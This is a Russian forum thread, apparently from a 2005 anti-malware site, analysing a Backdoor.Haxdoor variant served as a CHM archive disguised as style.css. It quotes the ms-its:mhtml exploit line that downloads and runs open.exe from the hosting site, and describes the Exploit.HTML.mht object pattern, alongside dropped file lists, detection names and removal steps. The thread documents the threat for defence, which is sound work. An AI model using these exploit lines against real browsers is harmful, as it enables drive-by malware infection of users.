-
BackDoor.Haxdoor устанавливается при просмотре сайтов
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
CLSID: {11111111-1111-1111-1111-222222222222}
Данная информация передана в лабораторию Касперского и другим вирусологам, но позволяет пролить свет на типовую методику внедрения данного зверя на компьютеры пользователей. Пользователь, которого занесло на указанный ресурс, работал под XP SP1 с включенным Firewall - и это его естественно не спасло. В ходе лечения на ПК изловлен типовой набор файлов, в частности:
open.exe - это инсталлятор "зверя", размер 44177 байт
wd.sys - 4096 байт
vdnt32.sys - 14832 байт
memlow.sys - 4096 байт
hm.sys - 14832 байт
draw32.dll - 33568 байт
cm.dll - 33568 байт
Как и известные разновидности, данная применяет руткит-механизмы, основанные на перехвате функций в User и Kernel режиме.
Администрации сайта techlabs.ru я отписал письмо с описанием того, что их сайт применяется как источник зверя ....
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Full Member
- Вес репутации
- 74
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10446 date=1113370404]
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
CLSID: {11111111-1111-1111-1111-222222222222}
...
[/quote]
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Сообщение от
userr
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?
Да, примерно так ... вообще методик известно великое множество, наиболее распространенные относятся к категории Exploit.HTML.mht - в теле страницы встречается характерный код типа ... <object data="ms-its:mhtml:file: ... - при его исполнении происходит загрузка и выполнение вредоносного кода. В данном случае применена именно такая технология в типовой реализации - когда "зверь" хранится в CHM файле, причем имя и расширение файла не играют особого значения. Есть и другие варианты - с применением апплетов, JPEG картинок с модифицированным заголовком ...
Причем что интересно - я утром отправил создателям сайта techlabs.ru письмо с описанием ситуации - между тем вредоносный файл по прежнему на месте.
-
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Может они так зарабатывают
-
-
Full Member
- Вес репутации
- 72
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Это только на IE работает?
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Ради интереса переодически кидаю его на вирусскан...
на 15-16 msk:
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)
на 19:45 msk:
Dr.Web ***Found Trojan.PWS.LDPinch.394
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)
-
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
[quote author=Участковый link=board=4;threadid=1103;start=0#msg10516 date=1113402436]
Это только на IE работает?
[/quote]
Судя пл всему да. Я не проверял на других браузерах, но подобные эксплоиты характерны в основном для IE.
Posted by: shu_b
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере
-
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
на 14.04.05 22:20 msk
Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)
-
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Сообщение от
shu_b
на 14.04.05 22:20 msk
Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)
Сегодня вечером я получил ответ от ЛК - все компоненты "зверя" классифицировали как и предполагалось - Backdoor.Haxdoor.cr. От создателей сайта http://techlabs.ru ответ так и не пришел, но сегодня я качнул файлик style.css- уже "Ошибка 404"... - файл вроде как убрали
-
-
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
Последний раз на 15.04.05 20:00 msk:
BitDefender ***Found BehavesLike:Trojan.FirewallBypass (probable variant)
Dr.Web Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus Found Trojan-Dropper.Win32.Small.ta
NOD32 Found probably unknown NewHeur_PE (probable variant)
VBA32 Found Trojan.LdPinch.4 (probable variant)
-
-
VBA
- Вес репутации
- 72
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10523 date=1113408675]
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере
[/quote]
Наверное нашему эвристику поверили ;D
-
-
Visiting Helper
- Вес репутации
- 76
Re:BackDoor.Haxdoor устанавливается при просмотре сайтов
хотя он и ошибся.... это ведь не пинчь... тогдаб уж назвали PSW-Trojan
-
-
хочу с вами познакомиться...
-
-
Со всеми сразу, или по очереди?
-
-
Visiting Helper
- Вес репутации
- 76
)))
Всего один дурной бит - и гигабайты лежат в маразме.
Скажи мне свою OS и я скажу тебе КТО ты.
-
-
про Haxdoor
>[QUOTE=Зайцев Олег]Сегодня на одном из ПК я изловил свежайшую >разновидность Backdoor.Haxdoor.
Это уже не свежая разновидность
хотя алгоритм тот же
Поймал у себя Haxdoor.cn версию этой заразы AVP не мог убить
файлы убиватьв Safe mode:
mszx32.exe - наверное теперь вместо open.exe
- cz.dll
- drct16.dll
- hz.sys
- vdmt16.sys
- winlow.sys
- wz.sys
лежит вся прелесть в system32
Кстати после изоляции вышеперечисленных файлов из родной папочки
каспер их стал видеть.
ну и в реестре ищите ссылки на winlow; vdmt16 и drct16
файлы перечисленные Олегом нифига не найдены, зато есть ключики в реестре (маскировка???) которые выносятся очень легко и просто.
Зато с ключами про winlow; vdmt16 придется попотеть.
Если создатель сего творения это прочитает, то пусть знает ОН ГАД КАКИХ МАЛО!!!!
-
-
Backdoor
А я то думал, шо опять комп бочит! Ведь тока систему переустановил! Сначала я воевал с Bloodhound.w32.ep, теперь Нортон обновив, напоролся на Backdoor.Haxdoor. Полный идиотизм - я что, приманка для троянов?!! Короче - кончайте все вирусы, беспощадно!
-
-
Спасибо за ценное описание (Гостю отдельно). Очень помогло.
-
-
-
-
Седня клиенты жаловались что у них в системе вирусня
Симантек 10.0 молчит как партизан (обновление 09.11.05)
Просканил систему с помощью AVZ 4.1
Лог скана не сохранил к сожалению....
Но AVZ сразу начал ругатся типа
обнаружена маскировка процесса explorer.exe и winlogon.exe
посморел через диспетчер процессов какие библиотеки использует
увидев такие подозрительные как
tcpQ32.dll - не есть гууд.
Заодно она прписалась в HKLM_SOFTWARE_Micrososft_WINNT_Winlogon
и оттудова никак не убирается....в Safe Mode тоже самое
Пришлось грузится с ERD и ручками рубить на корню в реестре
а заодно в System32...
После этого загрузился нормально и запустил скан Симантека
Мля скокоже он гадости надыбал
Backdoor.haxdor.E
Вопрос почему до этого молчал?? Ведь же вирус не такой новый..
Приходилось сталкиватся, до этого Backdoor.haxdor.C
-